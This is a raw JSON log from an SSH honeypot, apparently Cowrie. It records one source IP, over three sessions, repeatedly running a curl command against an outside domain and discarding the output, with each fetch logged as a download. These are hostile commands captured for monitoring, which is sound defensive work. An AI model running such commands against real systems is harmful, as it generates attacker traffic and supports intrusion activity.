{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.242434Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.246780Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.269293Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.270015Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.278806Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.282624Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.283274Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.316100Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.318129Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.318906Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.322912Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.323679Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.327043Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.330006Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.352139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.352954Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.358024Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.360096Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.360682Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.362362Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.363221Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.368434Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.394915Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.397814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.400445Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.402968Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.403979Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.406549Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.407398Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.409554Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.410565Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.443023Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.446079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.448814Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.450125Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.453023Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.454031Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.459802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.461154Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.501196Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.504210Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.507266Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.509253Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.510592Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.515757Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.517686Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.518359Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.520379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.521767Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.528562Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.557575Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.561570Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.564824Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.569883Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.570607Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.574631Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.576518Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.577135Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.578551Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.579378Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.611946Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.614031Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.617149Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.617907Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.621409Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.622220Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.624534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.625317Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.657629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.658776Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.660147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.668423Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.669212Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.683321Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.690233Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.694774Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.723679Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.724818Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.725417Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.728055Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.729260Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
